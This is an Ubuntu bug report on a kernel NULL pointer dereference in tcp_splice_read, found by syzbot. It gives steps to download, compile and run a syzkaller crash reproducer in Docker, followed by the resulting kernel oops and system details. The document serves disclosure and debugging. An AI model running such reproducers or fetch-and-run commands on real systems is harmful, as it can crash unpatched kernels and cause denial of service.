Ubuntu
linux package

NULL pointer dereference in tcp_splice_read

Bug #1953520 reported by Dmitry Nagornykh
262
This bug affects 1 person
Affects Status Importance Assigned to Milestone
linux (Ubuntu)
Confirmed
Undecided
Unassigned

Bug Description

A NULL pointer dereference was discovered in “tcp_splice_read”. The problem was originally found by syzbot, https://syzkaller.appspot.com/bug?id=506214c97a1af183589a4caf4a8fa162a9f56cbd. It is reproduced by the root user in the docker container or host
on Ubuntu 18.04.6 LTS with Linux 4.15.0-163-generic. It is reproduced on Ubuntu 18.04.6 LTS with Linux Ubuntu-4.15.0-164.172 also.
The bug reproducer is built from https://raw.githubusercontent.com/dvyukov/syzkaller-repros/master/linux/506214c97a1af183589a4caf4a8fa162a9f56cbd.c. It doesn't reproduce in Ubuntu 20.04.3 LTS with Linux 5.4.0-91-generic and Linux mainline v5.16-rc4. Mainline commit 07603b230895 (ChangeLog-5.1) fixes issue of propagate file from SMC to TCP socket.

There are steps to reproduce in the Docker container:
-----------------------------------------------------------
docker pull ubuntu
docker run -ti ubuntu bash
apt update
apt install gcc wget
wget https://raw.githubusercontent.com/dvyukov/syzkaller-repros/master/linux/506214c97a1af183589a4caf4a8fa162a9f56cbd.c
gcc ./506214c97a1af183589a4caf4a8fa162a9f56cbd.c -static -pthread -o 506214c97a1af183589a4caf4a8fa162a9f56cbd
./506214c97a1af183589a4caf4a8fa162a9f56cbd

The kernel crash contains as a result:
----------------------------------------
root@2d6b356e151a:/# ./506214c97a1af183589a4caf4a8fa162a9f56cbd
BUG: unable to handle kernel NULL pointer dereference at 0000000000000041
IP: tcp_splice_read+0x5f/0x2b0
PGD 8000000133bd3067 P4D 8000000133bd3067 PUD 12e34b067 PMD 0
Oops: 0000 [#1] SMP PTI
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in: smc veth xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo xt_addrtype iptable_filter iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack br_netfilter bridge t
 sysimgblt aesni_intel fb_sys_fops aes_x86_64 crypto_simd glue_helper cryptd psmouse drm floppy e1000 virtio_blk pata_acpi i2c_piix4
CPU: 1 PID: 4601 Comm: 506214c97a1af18 Not tainted 4.15.0-163-generic #171-Ubuntu
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: 0010:tcp_splice_read+0x5f/0x2b0
RSP: 0018:ffffb50cc381fdb0 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff9079f86952c0 RCX: 0000000000010000
RDX: 0000000000000000 RSI: 00000000fffffe01 RDI: ffffffff95e523a0
RBP: ffffb50cc381fe20 R08: 0000000000000002 R09: ffffffffc096e2c0
R10: 0000000000000000 R11: 0000000000000000 R12: ffff9079f1af7c40
R13: ffffffffffffffe3 R14: ffff9079edeebbd8 R15: 0000000000010000
FS: 0000000001a56880(0000) GS:ffff9079ffd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000041 CR3: 00000001309b2001 CR4: 0000000000360ee0
Call Trace:
 smc_splice_read+0x96/0xa0 [smc]
 sock_splice_read+0x25/0x30
 do_splice_to+0x79/0x90
 SyS_splice+0x6dd/0x730
 do_syscall_64+0x73/0x130
 entry_SYSCALL_64_after_hwframe+0x41/0xa6

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: linux-image-4.15.0-163-generic 4.15.0-163.171
ProcVersionSignature: Ubuntu 4.15.0-163.171-generic 4.15.18
Uname: Linux 4.15.0-163-generic x86_64
AlsaDevices:
 total 0
 crw-rw---- 1 root audio 116, 1 Dec 7 15:27 seq
 crw-rw---- 1 root audio 116, 33 Dec 7 15:27 timer
AplayDevices: Error: [Errno 2] No such file or directory: 'aplay': 'aplay'
ApportVersion: 2.20.9-0ubuntu7.27
Architecture: amd64
ArecordDevices: Error: [Errno 2] No such file or directory: 'arecord': 'arecord'
AudioDevicesInUse: Error: command ['fuser', '-v', '/dev/snd/seq', '/dev/snd/timer'] failed with exit code 1:
Date: Tue Dec 7 15:28:46 2021
InstallationDate: Installed on 2021-11-29 (7 days ago)
InstallationMedia: Ubuntu-Server 18.04.6 LTS "Bionic Beaver" - Release amd64 (20210915)
IwConfig: Error: [Errno 2] No such file or directory: 'iwconfig': 'iwconfig'
Lsusb: Error: command ['lsusb'] failed with exit code 1:
MachineType: QEMU Standard PC (i440FX + PIIX, 1996)
PciMultimedia:

ProcEnviron:
 TERM=vt220
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
ProcFB: 0 bochsdrmfb
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-163-generic root=UUID=8688c2d4-18cc-4c67-b9a9-dc3d4f4ed3f2 ro console=ttyS0 oops=panic panic=86400 ftrace_dump_on_oops=orig_cpu slub_debug=FZ maybe-ubiquity crashkernel=512M-:192M
RelatedPackageVersions:
 linux-restricted-modules-4.15.0-163-generic N/A
 linux-backports-modules-4.15.0-163-generic N/A
 linux-firmware 1.173.20
RfKill: Error: [Errno 2] No such file or directory: 'rfkill': 'rfkill'
SourcePackage: linux
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/01/2014
dmi.bios.vendor: SeaBIOS
dmi.bios.version: 1.13.0-1ubuntu1.1
dmi.chassis.type: 1
dmi.chassis.vendor: QEMU
dmi.chassis.version: pc-i440fx-focal
dmi.modalias: dmi:bvnSeaBIOS:bvr1.13.0-1ubuntu1.1:bd04/01/2014:svnQEMU:pnStandardPC(i440FX+PIIX,1996):pvrpc-i440fx-focal:cvnQEMU:ct1:cvrpc-i440fx-focal:
dmi.product.name: Standard PC (i440FX + PIIX, 1996)
dmi.product.version: pc-i440fx-focal
dmi.sys.vendor: QEMU

Revision history for this message
Dmitry Nagornykh (dnn81) wrote :
Seth Arnold (seth-arnold)
information type: Private Security → Public Security
Revision history for this message
Ubuntu Kernel Bot (ubuntu-kernel-bot) wrote : Status changed to Confirmed

This change was made by a bot.

Changed in linux (Ubuntu):
status: New → Confirmed
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.